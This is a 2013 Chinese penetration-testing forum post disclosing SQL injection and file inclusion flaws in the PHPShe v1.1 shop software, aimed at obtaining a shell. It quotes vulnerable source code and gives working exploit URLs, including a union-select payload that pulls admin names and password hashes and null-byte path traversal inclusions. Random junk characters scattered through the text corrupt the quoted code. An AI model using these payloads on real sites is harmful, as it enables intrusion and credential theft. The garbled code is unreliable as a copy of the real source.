找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2132|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/- h8 i& _; U# d7 J* i
/* Phpshe v1.1 Vulnerability
4 q0 q3 n! u$ i: w* a8 k/* ========================: o; W7 z/ Z& A3 p1 u# A
/* By: : Kn1f3
' l. T! U( k* ]* \$ \* |0 R/* E-Mail : 681796@qq.com
0 a! S$ J) |, i8 q0 J7 I/*******************************************************/5 y& \" L5 H  v0 A. L0 A1 L( l! r
0×00 整体大概参数传输) P' M  ~0 H4 x, N

9 }$ f, [3 C2 f
' f4 Q' r. K- S9 M  M$ J: e  ~7 ?! `" Z& O1 K1 y- m2 _
//common.php
: E( _3 A- ~8 b  V9 N9 h4 o/ Zif (get_magic_quotes_gpc()) {
; K" f' @- N' E7 D, f# B/ w!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
: I9 L; T& D- n. v. ~: x8 ^8 \!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');" b7 l; t* ~( V+ i, e. r& x
}
4 ]+ L- U" Y  q& I: j# ~else {" U5 u1 S3 f: }2 V# X
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
/ a: V! e9 A" W- g  I; O!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');# z* l9 {8 E* \* @  d. w  |; d
}
- X+ s$ [! v2 r0 k* Psession_start();
! a0 C6 r. d+ e' _!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');7 R0 J0 g* y& b2 I. _
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');: m5 H2 S( y, T4 ]+ p

9 W% Y/ i8 E+ l( Z# b8 p1 E0×01 包含漏洞
8 y  ^# ?. a) \0 p+ n
7 l2 C) o7 ]4 w7 ~1 S  d! P4 G$ l9 h  ?6 E( I
//首页文件
" L. e9 ~* p, R3 u" ^. v- z/ m9 _) X<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);$ V# Z  P# }- M* h: U$ Z
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
+ t! M9 n/ T  a. T, m: ~pe_result();
% l5 H& k4 h. ?# \?>
4 f) `& Z1 L" _$ I5 ~//common 文件 第15行开始
" g  c9 ^( w8 purl路由配置
: r3 z& z/ ?, h9 a' |$module = $mod = $act = 'index';, H, j  V# x9 _  B. ]% ]! _4 W
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);; u, F4 G: ]/ s+ ~2 e' {$ W* n: X
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);- M/ ~8 d2 a  V7 X7 Z9 t
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);  x' G4 P6 G7 ]- E: k- q& L
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%004 {/ y5 @* R$ `: l  F' L

4 n3 d  T. l! Q4 |* b# Z

, x4 h9 j; B. @7 ]; z8 G 0×02 搜索注入
9 ?( C* X7 B' }# E' H7 F; x2 b % d; a; V) y8 Y% W9 w
<code id="code2">

//product.php文件
, n+ F  X' ?  K4 h# c$ u# vcase 'list':" k- `1 V: N% i( S1 W9 j/ X4 n
$category_id = intval($id);+ G4 p' f; A5 V$ I# Z" B
$info = $db->pe_select('category', array('category_id'=>$category_id));
4 t" f- e. i1 u2 P* h- r//搜索' I* z0 Q- d( ]1 `3 n6 k7 M8 }* J
$sqlwhere = " and `product_state` = 1";
; s1 a, O) d, X2 Jpe_lead('hook/category.hook.php');  g, b, d( s4 u
if ($category_id) {; t9 q, |5 |0 c; t% P1 p  T2 s
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
! l" _4 @/ Y  o* x6 a$ V}! y; w  o0 D* Q: |9 B  `) E
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤# p- i9 [7 j, O9 F: ?
if ($_g_orderby) {
: z( R; D: x# |! `2 @# f$orderby = explode('_', $_g_orderby);
" [! c! z2 o5 s$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
4 _( r% \4 a+ W  H: F+ G& ]4 _7 P}- K. p$ m0 O- s9 t8 ]1 {
else {: v+ D" s2 w( Q) E
$sqlwhere .= " order by `product_id` desc";! q- o6 L+ ~# H' V, O% D
}  V8 h4 h- N% e& V
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));+ d9 |' p( D& {  J# M; A* A
//热卖排行: S6 q: ~* F7 H! l% Q  T4 h4 v
$product_hotlist = product_hotlist();
& W1 ]7 J' U6 m/ r' N# m//当前路径* `; `) }; b9 p4 ?' ]5 x  E
$nowpath = category_path($category_id);' h0 c( V! Q* u: Y3 Z( `. \
$seo = pe_seo($info['category_name']);
* A) n: t: ?3 |include(pe_tpl('product_list.html'));
( f. }; [9 k  X: n/ q* Z//跟进selectall函数库, D2 Y# M- n( A6 W8 V1 C$ c
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
7 Q4 s* U& {/ Q3 `; V{
/ ?8 m" T+ G& u//处理条件语句
3 t4 L  p6 }  H" @  ^$sqlwhere = $this->_dowhere($where);5 y* ^0 ~$ |+ u3 n: `
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
( |' f+ R; z/ K$ A$ ~0 P}; M. J2 N9 `' a4 f% F; \
//exp7 ?/ o5 C; [+ F$ J, F) P
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1# R- j- q- r' |: j/ C7 }

</code>5 T9 y% F8 P5 j3 u3 l! Z
- `/ y2 V" e( W3 {6 H) m0 A9 x, O) q
0×03 包含漏洞2; V  l9 X# r- @( }# v
- E; o7 ^8 t. f% h( k/ s  s
<code id="code3">

//order.php

case 'pay':


0 L  G+ g( E: }# ~" c# ]$order_id = pe_dbhold($_g_id);

6 `* d2 s) L$ R: w9 ~4 O
$cache_payway = cache::get('payway');


6 O& U! T& T" F. h1 y" c' mforeach($cache_payway as $k => $v) {

% T5 f# W- N, z! y9 J* W
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


- m: ~' w! K* J9 Q1 R6 q8 G0 {if ($k == 'bank') {


+ t6 ^8 Z0 X6 m, T) a$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

$ W* ^" [% `& V4 m: f! N# j1 _
}

; s2 Z3 d& W$ I$ h
}


4 O" K, d1 K  T$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


4 W, k- y% J; r. Q1 ?( [!$order['order_id'] && pe_error('订单号错误...');

% y" Q+ O  d7 C/ n& G& c
if (isset($_p_pesubmit)) {


! i, C* ~9 _4 c2 C1 Aif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


& l1 V! k# i  @+ R" w5 w7 v$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


) w* T8 V! y" iforeach ($info_list as $v) {

" P: B" u( W, X: M3 A# ?
$order['order_name'] .= "{$v['product_name']};";
9 y: H/ }1 D5 s0 X) O2 L) I9 E/ h

% }" E9 ?1 [. f' |8 x( a+ g
}


5 a5 V. Y- U+ E: Q$ U. Hecho '正在为您连接支付网站,请稍后...';


: C4 k, O3 W1 Z8 oinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


& \, n( G& H1 r( q; m}//当一切准备好的时候就可以进行"鸡肋包含了"

7 M; N6 a/ Y3 I9 j4 [( j
else {

/ O1 C0 `5 U# t' _! E# ~; U* R
pe_error('支付错误...');


3 [  @# `1 E$ b) L# R( r" ?}

# _0 R5 o7 C4 h& B
}

% U$ z/ \+ `$ K; H2 M, c; j
$seo = pe_seo('选择支付方式');

& D: y3 `! L; Z
include(pe_tpl('order_pay.html'));


5 `2 W8 C% e% G1 i: I" g0 r  Ubreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
$ [0 @; Q. X8 E5 @4 Jhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表